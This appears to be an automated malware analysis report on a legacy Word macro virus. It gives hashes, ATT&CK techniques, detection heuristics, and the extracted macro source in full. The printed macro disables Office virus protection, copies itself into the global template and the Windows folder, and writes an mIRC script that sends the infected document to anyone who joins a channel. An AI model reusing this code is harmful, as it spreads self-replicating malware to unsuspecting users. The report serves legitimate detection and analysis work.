Office (OLE) malware analysis — malicious · 261a90bb8643e28e

MALICIOUS

Office (OLE)

31.0 KB Created: 1999-12-27 16:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 72089e34e54121157d9de588bafbb9e6 SHA-1: 2b8f9c9b1bfde6d021c52a892ece8208d10c86bf SHA-256: 261a90bb8643e28e2c2d243844116f4f488bd6e64d70b0c988bcc0e7a6429113

340 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1071.001 Web Protocols

The sample contains a legacy WordBasic macro that uses the Shell() function to execute commands. The macro attempts to export a component named 'secret' to 'c:\windows\secret.sys' and copies 'secret.doc' to 'C:\Windows\'. It also attempts to write to 'C:\mirc\system\script.ini', suggesting an attempt to establish persistence or spread via IRC. The presence of legacy macro markers and the use of Shell() indicate a malicious document designed to execute arbitrary commands.

Heuristics 6

ClamAV: Doc.Trojan.Tech-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Tech-3
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
SHELL "COPY secret.doc C:\Windows\"
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2102 bytes
SHA-256: `5c31e44ee363836f93550bdfb7de24d744793a028002d5b125adc4c7ca7dd02c`
Detection ClamAV: Doc.Trojan.Tech-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Modul 1" atribute(VBE) = "secret" Sub FileOpen() ' Secret Script/Word Virus By Sinixstar - Metaphase VX ' Special thanks to Reptile/29a for the idea around that lil word virii patch ' Thanks to Knowdeth for all the help he's givin me. ' Also thanks to everyone else whos helped, you know who you are. Application.VBE.ActiveVBProject.VBComponents("secret").Export "c:\windows\secret.sys" On Error Resume Next Options.ConfirmConversions = False Options.SaveNormalPrompt = False Options.VirusProtection = False If ToolsWordCount.Count <= 500 Then For A = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(A).Name = "secret" Then NormInstall = True Next A For A = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(A).Name = "secret" Then ActivInstall = True Next A If ActivInstall = True And NormInstall = False Then Set Secj = NormalTemplate.VBProject _ Else If ActivInstall = False And NormInstall = True Then Set Secj = ActiveDocument.VBProject End If SHELL "COPY secret.doc C:\Windows\" SetAttr "C:\Windows\secret.doc", vbReadOnly SetAttr "C:\windows\secret.sys", vbReadOnly SetAttr "C:\mirc\system\script.ini", vbReadOnly Open "C:\mirc\system\script.ini" For Output As #1 PRINT #1 "[script]" PRINT #1 "n0=on 1:text: :?:{ s 2 \| halt }" PRINT #1 "n1=alias /s / *1" PRINT #1 "n2=on 1:connect:/.enable #d" PRINT #1 "n3=#d off" PRINT #1 "n4=on 1:join:#:{ if ($nick != $me) { dcc send $nick "c:\windows\secret.doc" } \| .disable #d \| .timer 1 60 .enable #d }" PRINT #1 "n5=#d end" Close #1 Secj.VBComponents.Import ("c:\windows\secret.sys") ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument End Sub End

Open this report in the interactive analyzer, or submit your own file for analysis.